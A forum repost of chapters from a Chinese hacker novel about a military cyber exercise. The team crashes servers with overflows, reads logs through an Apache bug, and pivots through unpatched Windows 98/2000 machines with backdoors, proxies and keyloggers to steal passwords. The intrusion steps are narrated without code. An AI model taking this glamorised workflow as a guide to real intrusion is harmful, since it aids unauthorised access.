  不行，我必须要珍惜这个来之不易的漏洞，要一步到位，我不要拒绝服务，我要渗入对方。
  老张脸色凝重，也在不停的调试他的程序。
  我们第一次有了紧张的气氛，我们第一次感到了对抗的压力。
  小余和信息对的那帮哥们开始对数据库系统开始重建。
  其实，我怀疑对方肯定已经获得了我们asp指挥系统的密码。我问信息队的哥们：“你们那个asp系统是用什么密码算法加的密呀？”
  他们说是MD5。
  我放心了。MD5是128位的加密。要用计算机跑出8位以上的密码，简直是不可能的事情。况且我们的密码是20位的。他们这么几天的时间不大可能跑出来。他们运气不可能这么好的。
  但是sql 2000有可以执行本地命令的漏洞。对方给我的2000 server作个木马的可能性也是有的。
  不过，现在我们已经把那个ip限制掉，对方的ip无法和我们连接，即使安装了木马也没什么用。
  小余他们开始重建数据库了。我们有备份，所以我们恢复起来不是一件难的事情。
  很快，他们几个让sql重新运行起来了。我们重新启动了我们的指挥系统。
  我对小余说：“密码一定要替换掉。”尽管我知道这个无所谓了，对方连上我们的机器都没有。但是，现在我们有必要要小心一点。不怕一万就怕万一。
  “那是当然的”。
  “刘队，指挥系统已经恢复”小余大喊。
    刘队长脸色缓和些了。快步向通讯室去了。
    大家看到系统已经没事情之后，紧张的气氛开始松弛下来。
    “妈的，对方真是厉害，这样的招数都想的出”小余笑骂。
    “呵呵，兵不厌诈嘛，咱们不是也是这么干耗着吗”小赵说。
    信息队有个哥们说：“其实我们也应该这么干，我们只要有了对方的ip，我们其实要破坏这个指挥系统还是一样容易。”
    “要是能够伪装对方的ip就就好了。”一个哥们说。
    “要伪装对方的ip给对方发数据包，这不难，但是要和对方建立连接，就不行的。”老张说。
    大家都哈哈哈大笑。都是内行，都知道，这个不过是我们的说着玩的。
    其实老张说的没错，ip通讯必须要和对方建立连接的话，你是无法伪装ip的。现在其实说的ip伪装，本质上就是一个网络地址转换。也就是用的别人的机器帮你通讯的。直接修改ip包中的源ip地址是可以的，对方也能收到，但是对方要和你建立连接，必须要反馈一个信息给你，你改了ip包，也就无法收到对方的确认消息，当然也无法和对方正确通讯。所以，很多人认为ip想怎么变就怎么变，这是不符合网络通讯原理的。这个只有在黑客电影和黑客小说里面才能看到。

    我们的工作又恢复了平静。大家又开始按部就班的工作。
    刘队长看我们工作没什么进展。曾经说起过，要向上级提出也拍特种分队夺取对方的一个指挥部。我们要有对方的ip，也能让对方瘫痪。即使对方能够恢复成功，至少大家打个平手。
    老张说：等等吧，我这里有点眉目了。一样可以让他们拒绝服务。
    这个当然最好了，刘队长天天都要来看老张的进展。
    我没有说我的apache的上面的攻击方法。等成熟了再说也不迟。
    其实，大家都明白，搞对方指挥部的点子对方首先使用，显然对方是有防范的。我们现在使用别人的烂招数，和送死也差不多。
    大家都在忙碌着，双方又开始干耗着。
    我看到外面警通士兵又增加了十几个人。是呀，如果对方知道我们的位置，派人来把我们端了，我们的信息对抗就全完了。
到了第10天的时候，我当时正在试验溢出数据。基本上有眉目了。
    听到老张一声大喊：“成功了！”
    大家都围上去了，包括刘队长。
    我看到老张在用自己的程序和对方的80端口通讯。但是对方没有响应。显然挂掉了。
    “我刚才测试了我的溢出程序，对方的redhat 9肯定挂掉了。”老张很兴奋。
    我们都回到自己的机器上，测试了一下，没错，对方的redhat 9 确实挂掉了。
    刘队长脸上有了难得的笑容，“说，好样的，我们总算也给对方一个教训！”

    我赶紧对老张说，先不要攻击了。小心被对方发现了。以后我们就难于成功了。我们现在手里有了对方的漏洞，我们就好好利用一下，要搞就彻底搞掉对方。
    初战告捷，大家的积极性非常高。你想，都沉默了10天了。基本就没什么突破。今天居然用我们的ip都让对方拒绝服务。能不高兴吗？
    刘队长一边高兴的说：“对，对，小王说的对”，一边又到通讯室去了，我想是报功去了吧。呵呵。
    对方的恢复速度非常快。2分钟之后，他们的系统重新工作了。我们估计可能正在检查是怎么回事。
    刘队长组织我们开会，研究下一部的攻击计划。老张脸上洋溢着笑。成功的喜悦我是能体会的。感觉真是非常好。
    “老张，你能不能利用溢出，让redhat开个新的端口。”我说。
    "有这个可能，我不敢保证。对方的防火墙很容易发现的。"老张说。
    "那就传个木马上去，我们特制的那个，防火墙也扫不出来“小赵说。
    ”这个漏洞让对方溢出还可以，但是要执行命令，可能性不大“老张又说。
    ”我这里发现apache一个漏洞，可以让我执行一些命令。至少把对方asp中ip限制改掉，问题不大“我说。
    大家都兴奋了。老张也眼睛发光。
    ”如果你能搞掉对方的防火墙，并且开个普通帐号的端口，我就能让他溢出获得root权利没问题。不过动作要快。对方的管理员不是吃干饭的。”
    “是呀，动作已经要看快，我们一旦打开一个缺口，对方可能马上就会发现，所以，我们必须以最快的速度，把对方的系统彻底破坏掉。”刘队长说。
    商量一阵，大家达成共识，现在开始，不对对方进行任何攻击，麻痹对方。然后我和老张加紧写攻击程序。成功之后，我们再制定一套方案，渗入对方系统获取对方的资料。或者彻底让对方系统瘫痪。
    于是，大家又开始工作了。我和老张的程序调试越来越困难。要让对方执行我的命令不是容易的事情。况且溢出时候执行的程序不能太多。只能执行非常少的一点点。所以，执行最有用最精干的代码是非常难于选择的。
    为了试验，我们在那台服务器上安装了和对方一样的redhat9和apache还有指挥系统，进行试验测试。不能再用对方的机器来做试验了。
    有了实际的试验环境，我觉得工作要轻松些了，可以马上试验，马上修改。甚至当初没发现的问题都发现了。比如，我发现我可以写个程序让apache里面的一个函数溢出，然后传入一些特殊数据，apache可以写服务器上的文件，我联想到那个溢出函数有printf字样，心里一阵的兴奋，看来apache的输出上有溢出。而且问题严重。但是新版本已经补了这个漏洞了。redhat上带的apache没有补过。呵呵，天助我也！
--------------------------------------------------------------------------------
作者: SimpleLove　　时间: 2004-3-19 23:13　　 标题: [转帖]我是一个黑客 [经典长篇小说]

演习 3

时间在沉默中不断的流逝，我们小组的工作也在一步一步的向前发展。老张利用linux 2.4内核的一个溢出漏洞，已经能够让对方停止服务。他试图进一步利用这个漏洞，试图让对方执行自己的代码，但是这个工作是非常艰苦的。从老张黑着的脸，和因为调试程序而显得呆滞的目光中，可以看出进展不大。
    我发现了apache的2.044版本的一个溢出漏洞。由于有实际的试验环境，我已经能够利用这个漏洞写服务器上的文件了。但是由于是利用溢出，所以，我只能写很少的数据，不是像平时一样想如何写就如何写的。
    小余和小赵加紧了对我们服务器的监控。信息队的那帮兄弟也在不停的分析那套指挥系统，试图找到更多的可以利用的漏洞，但是由于对方限定了ip，所以我们即使知道了对方的弱点，我们没有办法连接的。
    我现在正在想如何利用漏洞攻击对方。
    说老实话，如果利用我们现在的掌握的漏洞，要让对方的服务器停止服务，不是一件困难的事情。
    但是，我一直认为黑客的最高境界是渗入对方而不被发现。我们大家都清楚，如果让对方停止服务，对方的数据一般不会丢失，而且拒绝服务本身就是告诉对方有人在攻击。一旦对方全力监控，这个时候，你很难在对方服务器上获得更多的权限。
    我想渗入对方的服务器，现在只能通过80端口了。这样对方很难发现。但是对方一定也在监控中。他们不是傻子。想让对反发现不了你的连接这是不可能的。我相信对方也在监控之中。
    通过双方都知道的漏洞，成功的可能性很小，即使成功了，他们也会很快发现。
    怎么办？
    我的头都变大了。
    大家都在艰苦的工作。我们这里的标志就是沉默。这里没有烟雾缭绕，我们这里的人都不抽烟。现在抽烟好像已经不流行了？
    只有键盘敲击的声音，沉默，还是沉默。
    本来我想利用apache的这个漏洞，把对方指挥系统的ip限定部分的代码给改过来。但是对方的log和监控系统肯定会马上发现。这样，对方立刻就会有反应。我说过了，不管你多么的厉害，不管你是否掌握了对方的漏洞，但是你还是斗不过即使不如你的网管。没办法，强龙也难斗地头蛇。
    我试验了一下，利用这个漏洞，我可以获得或者向对方的文件读或者写字节数小于1024字节的数据，我心中一阵狂喜。
    我犹豫了一下，我决定冒一个险。这个险冒的是否值得，我现在也没有把握。不管他。
    我飞快的敲击键盘，构建我希望的溢出数据。然后在我们的服务器上试验了一下。成功了。应该不会有问题，主要程序我已经试验过多次了。
    我把我的特殊数据copy到浏览器上，同时开通主程序，通过和对方的80端口连接，然后发出我的溢出数据，让对方的apache产生溢出，这个时候，我再把我的另外一组数据通过浏览器请求，不出我所料，我的浏览器中出现了对方log文件的前面1024个字节。
    我读取的是apache的access.log文件，里面详细的记载了对方服务器上的连接信息。我看到几个我方ip，不过后面的代码都是400后面的，显然被拒绝了。
    当然我也看到了好几个304的代码，这是成功的连接。显然这是对方的ip，呵呵我要的就是这个，一共有10几个ip，我把他们copy到记事本中存储起来。
    即使我这样如此动作快的动作，还是被对方发现了。
    因为，其他沉默很久的兄弟们突然说话了。
    “奇怪，奇怪，我现在刚和对方建立连接，立刻被断掉。。。”老张似乎自言自语的说。不过，太安静了，大家都听到了。
    “是呀，刚才虽然不能访问对方的web，但是建立连接还是可以的，现在居然很快被断掉”小余也说。
    “难道，对方现在ip验证不是居于asp了，而是居于连接了。如果这样，就更困难了”小赵也说。
    我用自己的程序试了一下，果然，现在建立连接很快就被断掉了。
    看来，我刚才的小动作，一定被对方发现了。这个不难理解，他们的监控的人也不是吃干饭了。他们一定从log中看到我我成功连接了一次。这个时间虽然很短，平时一般是不会发现的，但是现在非常事情，对方权利监控，焉会漏过？
    现在对方已经重新改成了基于ip连接的验证，我们要直接攻击对方的服务器的可能性就更小了。大家一片沮丧。
    “干脆我们就搞拒绝服务，他们启动了，我们又来，咱们就和他们蛮干！"小余抱着后脑，仰在椅子上面。
    老张和信息队的哥们都停下来休息了。大家你一句我一句。大家都打算孤注一掷了。

    “服务器，看来是啃不动了，我们从他们的客户机器入手吧，来来，来领地址来。”我笑着说。
    大家一惊，半天没反应过来。因为我们当时的攻击条件都是只是知道对方主服务器的ip地址。其实真正的打仗的时候，即使ip地址也是可能很难知道的。现在，我居然说出这样的话，大家都是内行，能不惊异吗？
    我笑着看着大家，过了好一阵，大家才围过来。
    大家看到ip地址的时候都相信了。因为他们一看就知道我读到了对方的log文件。因为那个文件的格式，对这些精通网络的人来说，再熟悉不过了。
    我共享出那个文件。大家嘻嘻哈哈的回到座位上，一边down文件，一边说：”原来是你这个家伙把人家log文件搞到了“
    “你干脆他他们的密码文件搞下来得了，我们用计算机跑下，运气好的话，可能可能会出来。”一个哥们说。
   “呵呵，人家远程登陆都没有开，你晓得root密码也没用呀。”老张说。
   “就是，还是这些ip来的实在，这些下属单位的水平比他们对抗分队的要差的多。说不定我们搞掉一个，利用他做跳板，进入对方的server，对方不容易发现。”小赵非常兴奋。
   “别高兴的太早，能不能搞定还难说。大家千万小心，没有把握不要攻击，千万不要被对方发现。现在还想搞对方的ip是不可能的了。”我说。

   “Ok！”大家一阵欢呼，我们重新看到了希望。

  我们把这个十几个ip分了一下，大家都负责几个ip。避免几个人同时攻击一台计算机。
   我负责4个ip。不是一个网段，看来这几个ip都来自不同的地方。但是根据我经验，这几个ip都来自我们这个地区，看来是对方下属指挥部的ip没错。

   我没有贸然扫描对方机器，对方安装防火墙的可能性很大。我不想再还没有任何思路的情况下，被对方发现。
   我只要发数据包过去，正常情况下都会被对方的防火墙发现。只要对方发现我在扫描他，他有了防备，我要攻击就非常困难了。

   我在想如何入手。我猜想他们的客户机应该采用的微软的系统。如果那样的话，正常情况下，可以利用的漏洞不少。
   尽管危险，但是什么也不作，总是不是办法。
   我决定拿一台机器试探一下。
   我ping了一下那个ip，呵呵，time out。不通。看来对方要么没开机，要么安了防火墙。没开机的可能性不大，应该是安了防火墙。
   我想，这个时候对方的防火墙应该记录下来，我在ping他的消息。
   我马上启动我的连接程序，尝试和对方的端口连接。这些端口都是些防火墙的开的端口。不知道什么原因，大部分防火墙都开了端口，可能是为了获得他们公司发给他们的消息？这个端口都是可以连接的。而且不同防火墙的端口也不相同。我把我知道的所有防火墙的端口都尝试一遍，最后一个端口终于对了。连接成功。我的运气总是不好。
   对方用的是我们大家都熟悉的某某防火墙，那个公司以前的一个文字编辑软件非常不错。呵呵，有门，那个公司的防火墙不敢恭维，我已经知道他的一个漏洞。呵呵。
   乘对方还没采取措施，先搞掉他的防火墙再说。我立刻发了一个数据包过去，这个数据包，专门对付这个公司的防火墙，百试百灵。
   呵呵，果然，对方的防火墙退出了。我ping对方，已经正常响应了。赶快扫描，如果有心人发现防火墙没工作了。就麻烦了。
   这个时候扫描的时候到了。我开动自己写的基于命令行的扫描程序。
   结果源源不断的出来了。
   根据返回回来的数据的情况我判断。
   对方是采用的居然是的window98系统的计算机。
   我的心开始下沉。
   你别看windows98一身的毛病，让他蓝屏易如反掌，但是要想再他上面远程登陆，放个木马什么的，反而比windows2000更难。
   windows设计的时候就没有考虑要做服务，甚至连远程登陆的功能几乎都不完善。
   我看到几个熟悉的端口，我可以让他蓝屏，死机，但是我无法远程登陆上去。

   我的运气一向不好。
   我的心情瞒沮丧的。其他人也没有传来好消息。
   看来，使用下个ip之前。我必须要祈求上帝保佑了。
   本来想把那个计算机搞瘫痪。想想不要引起对方太大的注意。也就罢了。
--------------------------------------------------------------------------------
作者: SimpleLove　　时间: 2004-3-19 23:14　　 标题: [转帖]我是一个黑客 [经典长篇小说]

演习　4

我的ip地址测试到还剩一个的时候，我都没有发现对方的计算机可以渗入的地方。想让对方死机不工作，真的非常容易。他们下属指挥部的计算机基本没怎么防备。漏洞不少。但是他们都没有开服务，所以，我无法连接上去，放木马。不能放后门，我们就无法采用这个程序来连接对方的服务器。
     哎，其实技术是非常无奈的。黑客的成功是非常随机的。常常看到，网上很多人找人去黑什么什么网站，其实，不管这个黑客多么的厉害，一个防备完善，监控严密的系统，要侵入是非常不容易的。采用能否黑什么网站来衡量一个黑客的技术水平也是非常幼稚可笑的。不管你的技术多高，不管你是否能写一个操作系统，你要侵入的别人系统，通常的决定因素是对方的防备，而不是你的技术水平，技术水平只是代表你利用漏洞的水平的高低，如果对方根本没有漏洞，你就什么办法也没有。
    不过，这个世界上没有漏洞的程序从理论上说是不存在的。所以，黑客这个角色就存在了。存在就是合理的。
    其他兄弟也没发现什么漏洞。对方清一色几乎全部是window98的机器。要侵入，实在太难。
    吃晚饭的时候，大家都非常累了。大家边吃边交流，都没什么收获，结果都是和我的效果差不多。
    其他兄弟们遇到的机器几乎都是98的机器。他们也没有办法渗入。

    说句实话，我对windows98远没有对windows nt熟悉。因为平时没有人使用98来做正式服务器的。而要让98死机篮屏真的太容易。我对98一向是非常看不起的。
    不过，如果你对2000不会配置，对黑客来说，98反而更安全。我们都有点绝望了。
    晚饭后，我和老张开始各自安装了一个windows98，我们都采用的是的默认安装。我们希望找到看能否利用的地方。
    老张和我都是属于调试级别的，我们喜欢自己找漏洞，这样才能以不变应万变。
    我比较鄙视那些把人家网站搞的乱七八糟的所谓的“黑客”。现在黑客成为反面形象，和这些人脱不了干系。
    其实，hacker这个词刚产生的时候并不是贬义词的。甚至从技术上说，还是一个褒义词。
    可是，现在很多人，连网络原理都整不明白，整天就想着把人家的网页改了，把人家的服务器搞的拒绝服务了。他们就高兴了。
    网上很多黑客教程一开始就来：请开动扫描器，随便输入XX段到XX段的ip，等它扫吧，运气好的话，就可以看到肉鸡出现了。
    晕，这哪里是黑客？这分明是江湖郎中嘛，反正碰到一个算一个，管你是什么机器。呵呵，实际上他们这样找到的机器99％是个人计算机，一点意义都没有，除了作为吹嘘的谈资。
    我很难理解有些人好不容易进入人家机器，把人家的主页改的乱七八糟，甚至改成黄色页面的都有，你说这个不是心理变态吗？
    这样的人现在太多，网上好多黑别人网站都是这些人干的。但是，这些人几乎没有能进入过知名的一些技术力量比较强的网站。
    至于什么中美黑客大战还有什么中日黑客大战什么的，更是无聊。
    这个世界很多东西不是技术能解决的。做这些事情的人，都是些不懂政治的人。政府都没有表态，你们自己跳什么跳，还“大战”，结果怎么样？
    实际上，美国的一些真正的黑客，更本就没有参加。我们国家也是一些一般不超过30岁的一些年青人。即使这样，也可以比较出我们的技术比人家差的不少。
    我在网上有一个台湾和美国还有一个俄罗斯的黑客朋友，他们的技术不是乱盖的。但是他们从来没有参加过如此无聊的活动。
    我也不会参加这样的活动，无聊，而且比较危险。说不定政府风向一变，你就是世界第一黑客，在政治面前，你也不过是个可怜虫。
    真正爱国的话，就什么空话都不要说，多做点实际的事情。比什么不强？
    老张不愧是调试方面的高手，我看到他已经在开始调试windows98的通讯程序了。他的动作很轻松，看来还没什么实质性东西。
    我也无聊的在windows98中乱点着，我主要看windows98默认情况下面都有些什么东西和网络通讯有关？
    我先看共享。windows98的共享是个路人皆知的漏洞。破译windows98的共享密码简直易如反掌。但是默认的时候共享是不会打开的。实际上，我们刚才扫描的计算机都没有开共享，否则，早就被我们攻破了。看来走这条路线行不通了。
    我点开网络邻居，我看到了一个哥们的计算机，我也看到了老张的计算机。
    我点右键，选择属性，选工具，我看到了那个网络监视器的按钮。我的心中一动。
    这是用来监视其他网络邻居的计算机的，如果对方开了远程管理的话，我只要知道密码，我就可以连接上去，并且可以访问他的资源。
    我查看了一下进程，我向老张的计算机试图连接，结果要我提示输入密码。看来windows98默认是开了这个服务器的？但是，老张那天如果不设置密码的话，我无论输入什么，都是不能监视对方的！
    我赶紧跑到老张的计算机上去。
    “老张，windows98默认开了一个远程管理的，但是在你没有设置密码之前，他是拒绝所有连接的。我们可以想办法，让它接受连接。”我兴奋的说。
    老张也兴奋起来了，他知道这意味着什么。他很快找到了那个功能，然后设置了一个密码，我从我的计算机立刻就连接上去了。当然密码还是要的，我居然可以修改对方机器上的文件！
    我们连接的程序实际上就是那个 NETWATCH.EXE程序。
    “老张，我们跟一跟这个程序，没准能找到漏洞，98漏洞的多是出了名的。呵呵”。
    “好好。”老张的softice又呼出来了。
     我也回到我的机器上开始调试了。

     调试程序的工作真是枯噪又乏味。这个程序没有加密，跟踪起来不是很难。就是烦。到12点过的时候，我的头脑开始迟钝的时候，我还没有找到什么漏洞。我决定睡觉。
     睡前，我看到老张，正在本子上用笔画着什么，他在分析那个程序和对方通讯的数据结构。

     我6点钟就醒了，不能入睡，搞计算机的人就是这样，心里挂着程序，一般不会睡懒觉的。呵呵。
     老张还在睡，可能昨天搞的太晚上，他的桌上散乱的本子上密密麻麻地写着16进制的数据。

     我刚坐到计算机前面，老张也醒了，立刻兴奋的对我说：“小王，我昨天发现那个程序如果提交一个大的数据包，远程管理的服务器程序，就会挂掉，但是windows98还是工作正常。”
     “真的呀，那么对方溢出之后，服务器还能连接吗？”
     “能，而且。。。。。呵呵，密码都不需要了。”老张压抑不住心中的兴奋。
     我的手指已经开始启动那个程序了，我把老张写的那个发数据包的程序，copy过来，发了一个数据包给老张的机器。然后启动win98的那个网络观看器，输入对方的计算机名字，果然，密码筐里面随便输一个字，进去了！
     我看到了对方的磁盘，我可以上传文件。天！
    老张，得意而且兴奋的看着我，我笑着对他竖起大拇指。

     如果这样的话，我们可以连接到对方机器上，然后传个后门上去，然后让对方执行。呵呵，那不是成功了？想到这里，我抑制不住一阵的兴奋！
    但是，很快我就发现，这个连接只能通过对方的计算机名字连接，无法通过ip连接。对方的计算机名字和我们不是一个网段，所以是无法被解析的。这个连接本质上不是居于tcp/ip的，而是使用netbeui的，这个协议无法跨网段。

     没关系，我想了想。立刻开始扫描我们攻击ip所在的网段的其它ip。只要我们拿下这个网段其它机器上的随便一个，呵呵，通过它，我们一样可以进入目标计算机。
     我猜想，对方的指挥部可能使用的民间的网络。其它计算机很可能不会是他们军方在用，说不定就是民用的。演习嘛，大家都躲到民间来了。我们不也躲到学校里面来了吗？

     扫这些地址，我没有犹豫的。对方不可能有很大防备，而且使用电脑的人未必就是专业人士。

     很快，我扫到了好几台计算机。今天运气不好，没有直接扫出密码的。但是空连接没有禁止的2000机器很多。呵呵。居然看到一个机器开了3389端口。立刻使用客户端上去一看，一个中文windows2000系统。输入administrator的用户名，一看，哈哈，我今天的运气怎么这么好？居然没有打补丁，连输入法漏洞都没有补！
     这也难怪，普通老百姓用机器，怎么可能考虑这么多。

     没什么好犹豫的，我用了1分钟就利用这个漏洞给自己开了一个超级权限的帐号，呵呵，没关系，对方肯定发现不了。况且我只要几分钟就够了，我对这个计算机并不感兴趣！
     我立刻上传老张写的那个攻击程序，带上我们目标计算机的计算机名字，开始攻击！然后传入，老张改写的可以在2000下和对方连接的程序。
     我飞快的向我们的目标机器上传入我们的后门程序，和破坏对方的防火墙监控的程序。然后改了它的启动配置文件。立刻退出。

    退出的时候，我和老张都松了一口气。
    我们相视一笑，立刻启动攻击98的程序，让98死机，容易。当我轻松的敲入那个98暴力攻击程序之后，我心里一阵的轻松。
    果然，很快，对方的计算机停止了响应。
    对方肯定死机了。只要等他重新启动，我们的后门程序就会工作了。
    那个时候，我们想进入对方的计算机立刻非常容易了。
    如果这样的话，我们要渗入对方的服务器就容易多了。呵呵。

    我和老张互相击掌，都很兴奋。
    趁这个空隙，我点了一首歌曲《慢慢来》，忧郁的歌声飘出来。
    我很喜欢的歌曲，有点沧桑的感觉。
    不要紧，有些话只是处于习惯，你应该逐渐学会坦然，幸福有一点点，一样的日子也甜，要懂得感谢，懂得随缘。。。。。。
    不要紧，慢慢来。。。。。。
待续......
--------------------------------------------------------------------------------
作者: SimpleLove　　时间: 2004-3-19 23:14　　 标题: [转帖]我是一个黑客 [经典长篇小说]

演习　5

那首歌听完的时候，在我和老张启动的客户端程序上，看到了我们的后门程序的响应信息。
    现在我们基本控制住了这台机器。按照对方的防护手段来看，他们不大可能发现我们。
    现在我们要做的工作就是通过这台计算机进入他们的服务器。
    最好不要让他们发现。最后如果不行，我们就搞暴力拒绝服务攻击。
    我们使用我们的客户端连接上那台计算机，我们开始连翻看他们机器上文件的兴趣都没有。我们直接建了个代理服务器。是个修改了的proxy，我们隐藏了它的界面。
    可能他们做梦也没有想到我们会搞到他们下面指挥部的ip，而且还成功攻陷，所以，这个其实只要看看进程列表就能发现的代理服务器他们也没有发现。其实不是没有发现，关键是他们根本就没有想过去发现。人在没有任何防备的情况下，很多东西是不会发现的。一个再精明的人，在大意的时候都会犯错误。
    凭良心说，不是我们多么厉害，确实是对方压根就没有想到，如果他们知道了，要断掉我们简直是举手之劳。
    接下来的事情就非常简单了。
    我们再接再励，马上传了一个键盘捕获程序，并且启动了它。我们需要获得他们登陆他们指挥系统的密码。
    然后，我和老张就紧张地等待着。

    我们不停地查看捕获的键盘信息。但是一直就没有可用的信息。几个可以的键盘组合，我们马上通过代理进入他们的主机试图进入他们的指挥系统，都失败了。
    时间在我们焦急的等待中流逝。。。。。。
    到下午黄昏的时候，终于我们看到一组可以的字符串，我们毫无意识例行公事的把它输入到登陆网页，并且敲击了回车。
    哈哈哈，终于进去了！

    我和老张楞了10秒钟都没反应过来，我们的思维定式已经就是失败了。我们try的次数太多了，思维都机械了。
    10秒钟后，我们大喊起来，我哈哈大笑。老张几乎手舞足蹈起来。
    你想我们拼命为之工作的目的终于达到了，我们能不高兴吗。

    大家都围上来了，刘队长也从隔壁过来了，问：“怎么啦，怎么啦？”
    “老张攻破98的远程管理漏洞，我们进入了对方下属指挥部的一个计算机。”我兴奋的说。
    “对呀，我和小王现在已经获得了对方进入指挥系统的密码，我们可以看到他们的指挥系统了。”老张看起来居然像个孩子。
    我飞快地在浏览器中敲入对方的服务器的ip，熟练的输入密码，对方的指挥系统主菜单进入大家的眼帘。

    刘队长和其他兄弟们楞了一下，大家都立刻欢呼起来。
    “你们已经在他们的机器上做了代理？”刘队长声音都有点发颤了。
    “对呀。”我答。
    刘队长马上就到通讯室去了。
    一会儿，刘队回来了。我们开会。大家的兴奋几乎洋溢在整个屋子。

    这么久了，我们小组终于取得突破性进展，大家都非常高兴。
    刘队开始部署下一步的计划。
    虽然，刘队没有具体的实施，但是他的思维不是一般化的。
    “下面，我们有了绝对的主动。刚才小王获得了十几个对方下属指挥部的ip。我们可以利用老张和小王发现的漏洞进行攻击，争取能攻克更多的对方的下属机器。然后建代理，捕获密码。我们不再对对方的主服务器进行任何攻击，我们保持现在这个状态就好。我们只要能看到对方的指挥系统，我们就能了解他们部分的行动部署，这对我们演习的胜利的作用可以说是绝对的。
    “从现在开始，除了派一个人监视我方服务器，和备份系统之外，所有的人全部进攻对方的下属的机器，然后我们同时把攻克了的计算机上看到的指挥系统的内容和情报全部传回来。我们放到我们的服务器上，让我们的指挥部可以看到。。。 。。。”

    刘队长说的没错，他们指挥系统也是有权限的。下属单位不是所有的资料都能看到，都只能看到和自己部队有关的的资料，其他无关的东西，他们也是看不到了。
    所以我们光只有一台，也不能获得太多情报。我们必须继续攻克更多的计算机。对方也不是傻子，他们不会让下属单位知道所有的资料，因为下属单位如果被对方端了，后果不堪设想。

    没关系，我们似乎觉得胜利就在眼前。我觉得其它ip要攻陷也是迟早的事情。

    晚上的时候，我和老张感觉轻松，我甚至听到老张边吹口哨边敲键盘。
    其他兄弟们都在攻击其它ip所在子网的其它计算机，以便利用老张那个攻击程序，取得目标计算机的绝对权限。
    大家都是内行，方法一旦公开，不用多费口舌，各自都在进攻自己的目标。
    刘队长在通讯室和我们工作室进进出出，不停地从攻克的计算机上传回对方的各种资料，然后及时的向上级报告。
    大家都在紧张而有序的忙碌着。

    捷报不断传来，小赵和小余都成功攻克了一台计算机，老张也攻克了一台。信息队的军人们也不是等闲之辈，他们也成功的进入了对方的计算机。
    到第二天早上的时候，我们找到十几个ip攻克了大半。我们的信息也越来越多。忙的刘队跑进跑出的。
    不过大家都是愉快的。
    我们在对抗中可以说获得的绝对的优势。他们对抗分队再厉害，也无法发现我们已经获得了他们大量的情报。我猜他们肯定纳闷，我们怎么不对他们的计算机进行ddos攻击了？
    他们监视连接中全是他们自己的ip，他们当然发现不了我们已经通过他们下属的机器获得了他们的情报。哈哈。
    其实，很多系统都是一个不起眼的地方出了问题，导致整个系统的失败。真的，在计算机安全方面，任何小的倏忽，都可能带来致命的后果。
    现在很多软件设计人员对安全方面的问题一点都不知道，这绝对不是好事。尽管很多设计人员对他所使用的语言和系统非常熟悉，但是对安全问题的忽略，往往会种下祸根。
    比如现在很多交互式的论坛，其实就有大部分都有这样那样的问题。都是修修补补，在设计初期，很少人考虑过安全问题。
    很多软件的功能设计非常优秀，但是安全问题非常差。
    我印象最深的是某个叫XX保镖的计算机保护软件，说实话，功能我很佩服，我也搞过这样的程序，但是他们有个非常大的漏洞，可以让人几乎不费吹灰之力的获得他们超级用户的口令！
    我倒。我想设计人是个计算机方面的高手，而且对底层非常的清楚。但是他绝对是个安全方面的新手，安全意识非常薄弱，种下这样的祸根！

    那天晚上，我睡得很香。
    接连的几天里，我们过的非常轻松，刘队脸上总挂着微笑。
    他不停的给我们说演习，我们蓝方现在掌握了绝对的主动权。
    呵呵，这是当然了。现在大家都是演习，不是真的拼命。谁掌握了情报，可以说谁就胜利了。
    我们现在几乎比对方的某些下属单位掌握的情报还多，你说对方能玩得过我们蓝军吗？

    然后我们的日子就比较好过了。大家都开始放松了。连老张都放弃了对对方服务器实施攻击的想法了。这样虽然我们没有获得对方的服务器的控制权，但是我们最重要的目的都达到了。
    还要怎么样？这样，对方又不容易发现，我们得到了想要的一切。

    我偷偷的打开QQ，哇，天，我失踪了这么多天，QQ上的小敏的头像闪动不停。还有小林警官的。
    看看小敏给我留的话。
    “你还好吗？“
    “当兵不能上网吗？”
    “怎么还不回话？”
    “晕，手机也不能用？”
    “短消息看到了没？”
    “哎。。。。有点想你了。”
    “你什么时候回来呀？”
    我的鼻子有点酸酸的。这么多天来，我真的和世界隔绝了。我的手机放到军区招待所里面了。根本就不准带出来。
    小敏你还好吗？我家里的那把吉他，也好久没有摸了。

    然后看小林警官的话。
    她不知道我到什么地方去了。
    她问的都是些技术问题。
    看到我没有回话。
    后面跟了几条：“人呢？？？？”
    就没有什么后话了。
    我飞快的给小敏留下“我很好，过几天就回来了，我的手机不能使用，QQ也是我偷着用的。”
    给小林警官留下：“出差中。。。。。。。”
    然后飞快的关掉QQ。
    点开一首水木的墓志铭，开始发呆。。。。。。

    我有点想家了。

--------------------------------------------------------------------------------
作者: SimpleLove　　时间: 2004-3-19 23:14　　 标题: [转帖]我是一个黑客 [经典长篇小说]

演习　6

不知不觉中，我到部队已经有20天了吧。具体多少时间，我似乎没有在意。
    最近几天，太过紧张，太过兴奋了。调试程序太紧张，最近获得对方指挥系统的信息，让我又太过兴奋了。
    我和老张都比较喜欢汇编级别的调试。其实现在把一个程序反编译成相应语言的工具也不少。大部分服务程序都是c写的。windows下的一些小程序，甚至不少是VB写的。很多程序从源程序去分析一般都是找不到逻辑上的漏洞的。因为这个漏洞在测试阶段大部分都被检查出来了。
    但是如果你把他直接反成汇编指令，有些逻辑上的没有的问题，因为内存的分配，函数自己设计的bug等等问题杂在一起。漏洞就出现了。
    调试程序真的是苦差事。现在新一辈的同行们，能吃这个苦的人确实不多了。
    你看网上那些研究调试和汇编的网站的人气，你就明白了。我以前喜欢的几个站点到现在都基本转行做其他的了。
    这次到部队，我真的不后悔。我认识了一个强人，老张。老张是个真正的黑客。他有着无比的耐力和扎实的功底。但是，我从来没有听到老张在我面前夸耀他曾经黑过什么网站。真的，一次都没有。老张矮矮的，胖胖的，戴深度近视眼镜。走在街上，你绝对不会注意到他。但是，他就是一个真正的黑客。
    黑客从一开始产生，就不是代表破坏，他代表的是高超的技术。现在那些以攻击别人网站，破坏别人的数据为乐的人，他们不是真正的黑客。
    老张扎实的汇编功底，和对windows系统的高超的调试能力，让我感到佩服。尽管，我在老张心中的地位可能也是很高的。
    其实，老张还有一点让我最是佩服的就是他那种骨子里面透露出来的那种计算机工作者的气质。
    对，就是气质。那种同行人，即使不说话都能感受到的那种大家的气质！
    我一直认为，专业计算机人的那种气质绝对不是一个非计算机专业演员能够表演出来的。这也是现在的表现计算机工作者那些影视作品无法另人满意的一个重要原因。
